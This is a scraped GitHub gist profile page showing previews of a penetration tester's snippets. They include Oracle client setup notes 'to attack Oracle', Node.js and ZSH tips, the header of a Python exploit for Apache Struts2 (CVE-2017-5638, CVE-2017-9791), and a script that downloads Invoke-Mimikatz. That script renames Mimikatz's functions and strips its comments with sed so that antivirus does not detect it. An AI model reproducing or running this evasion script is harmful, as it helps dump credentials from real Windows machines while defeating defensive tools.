Skip to content

Instantly share code, notes, and snippets.

View XC3pti0n's full-sized avatar

Xcepti0n XC3pti0n

View GitHub Profile
@XC3pti0n
XC3pti0n / instant_oracle
Last active December 17, 2019 03:25
Instant Oracle SQLPLus SDK +oci8
########### Build to attack Oracle in under 20 mins ###########
[] Kali 2018.1 (64bit)
root@kali:~# mkdir /opt/oracle
root@kali:~# cd /opt/oracle
root@kali:/opt/oracle# wget instantclient-basic-linux.x64-12.2.0.1.0.zip (68mb)
root@kali:/opt/oracle# wget instantclient-sqlplus-linux.x64-12.2.0.1.0.zip (1mb)
root@kali:/opt/oracle# wget instantclient-sdk-linux.x64-12.2.0.1.0.zip (1mb)
[] Download from http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html (x86_64) xce/orc
@XC3pti0n
XC3pti0n / node.md
Created April 17, 2018 17:21 — forked from GracjanZwr/node.md
installing nodejs in Kali Linux
@XC3pti0n
XC3pti0n / node-install.md
Last active April 17, 2018 17:59
NODEjS Installation on Kali 2018.1
#!/usr/bin/python
# Strut2 S2-048 Headers Exploit
# From https://github.com/rapid7/metasploit-framework/issues/8064
# From CVE-2017-9791
# From CVE-2017-5638
# Coded by Xcepti0n
import requests
@XC3pti0n
XC3pti0n / ZSH .bashrc
Last active April 23, 2018 03:18
Replacing Bash with ZSH in Kali 2018.1 (the right way)
Add the following to your .bashrc
if [[ $- == *i* ]]; then
export SHELL=zsh
exec zsh -l
fi
@XC3pti0n
XC3pti0n / invoke_evasion.sh
Created May 30, 2018 05:20 — forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1